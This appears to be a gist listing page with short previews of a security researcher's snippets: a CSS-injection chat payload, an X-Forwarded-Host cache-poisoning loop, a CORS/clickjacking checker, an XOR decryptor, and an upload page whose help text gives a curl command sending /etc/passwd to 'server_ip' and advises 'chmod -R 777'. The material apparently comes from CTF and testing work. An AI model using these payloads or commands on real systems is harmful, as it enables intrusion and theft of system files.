I hereby claim:
- I am LuD1161 on github.
- I am aseemshrey (https://keybase.io/aseemshrey) on keybase.
- I have a public key whose fingerprint is 67B7 7F3A F3DA 6ACB 5662 6391 A7AE 09D5 4F0E C798
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
Hi ~ This is a gist !
# -*- coding: utf-8 -*- | |
# Character sets consumed by generate_payload (defined below; body not shown here).
char_al_num = '0123456789abcdefghijklmnopqrstuvwxyz'   # digits + lowercase letters
char_spl = '!"#$%&\'()*+,-./:;<=>?@^_`{|}~ '            # punctuation + space
char_Al = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' + char_spl       # uppercase letters + punctuation + space
# Chat command string: sets the name to a CSS rule whose background:url() points at
# the room's /send endpoint. Room id and domain are specific to this gist's target.
put_secret_in_chat = "/name leaker ] {color:blue; background:url(/room/3fa91dea-2fc6-4e0f-a614-8243c50e62d8/send?name=admin&msg=/secret abc; Domain=somecompany.co.uk);} "
def generate_payload(new_char_returned_by_admin): |
// Set name | |
// Choose a random "<color>_<breed>" handle and persist it in localStorage the first time.
const colorChoices = ['brown', 'black', 'yellow', 'white', 'grey', 'red'];
const breedChoices = ['ragamuffin', 'persian', 'siamese', 'siberian', 'birman', 'bombay', 'ragdoll'];
let color = colorChoices[Math.floor(Math.random() * colorChoices.length)];
let breed = breedChoices[Math.floor(Math.random() * breedChoices.length)];
// Truthiness check on purpose: an empty stored name is replaced as well.
if (!localStorage.name) {
  localStorage.name = `${color}_${breed}`;
}
// Utility functions | |
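// Read a cookie value by name from document.cookie; returns undefined when absent.
// NOTE(review): `name` is interpolated into a RegExp unescaped — assumed to be a
// plain cookie name with no regex metacharacters.
let cookie = (name) =>
  (document.cookie.match(new RegExp(`(?:^|; )${name}=(.*?)(?:$|;)`)) || [])[1];
// HTML-escape a string before it is placed into markup. The replacements must
// produce entity names (&lt; etc.), not the raw characters, otherwise the function
// is a no-op; `&` is escaped first so the entities emitted below are not re-escaped.
let esc = (str) =>
  str
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');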
// Sending messages |
# SSH Tunnelling | |
https://www.digitalocean.com/community/tutorials/how-to-route-web-traffic-securely-without-a-vpn-using-a-socks-tunnel | |
ssh -D 8123 -f -C -q -N sammy@example.com | |
# For decompiling to source files from webpack's compiled bundle, if you have the map | |
https://github.com/paazmaya/shuji or forked one here ( https://github.com/LuD1161/shuji ) | |
To get the source map, usually append .map to the end of the .js URL, e.g.: | |
https://company.com/app.b12fec8.js so map would be at https://company.com/app.b12fec8.js.map |
<!DOCTYPE html> | |
<html> | |
<head> | |
<meta charset="utf-8"/> | |
<title>CORS and Clickjacking checker</title> | |
<style> | |
body { | |
font-family: Arial; | |
color: white; | |
} |
""" | |
A horrible script, however gets things done ;) | |
USE CASE : If a file is encrypted with a simple XOR | |
Enter the expected key; this can be the file format's header bytes in hex | |
It will automatically find the key based on that header | |
And write out a new file from it | |
""" |
from time import sleep | |
import requests | |
import webbrowser | |
# Value sent as the X-Forwarded-Host header on every request in the loop below.
X_Forwarded_Host = 'my_server' | |
# Poll the same URL forever (no exit condition; stop with Ctrl-C), printing the
# response headers each time. Uses the Python 2 print statement, so this is Python 2 only.
while True: | |
resp = requests.get("http://3fad5c9a76928974bc36ef08fb1dfa2c98e98740.hm.vulnerable.services/cdn/app.js", headers={'X-Forwarded-Host': X_Forwarded_Host}) | |
print resp.headers | |
sleep(0.5)
// Declared with var and initialised to null; where it is assigned is outside this excerpt.
var token = null; | |
Promise.all([ | |
fetch('/api/movies').then(r=>r.json()), | |
fetch(`//3fad5c9a76928974bc36ef08fb1dfa2c98e98740.hm.vulnerable.services/cdn/main.mst`).then(r=>r.text()), | |
new Promise((resolve) => { | |
if (window.loaded_recapcha === true) | |
return resolve(); | |
window.loaded_recapcha = resolve; | |
}), |
<!DOCTYPE html> | |
<html> | |
<head> | |
<title>Upload your files</title> | |
</head> | |
<body> | |
<h1> Make sure you've set the right permissions for your "uploads" directory i.e. chmod -R 777 uploads </h1> | |
<h2>For curl command : curl -F "uploaded_file=@/etc/passwd" http://server_ip/path_to_this_script/upload.php </h2> | |
<form enctype="multipart/form-data" method="POST"> | |
<p>Upload your file</p> |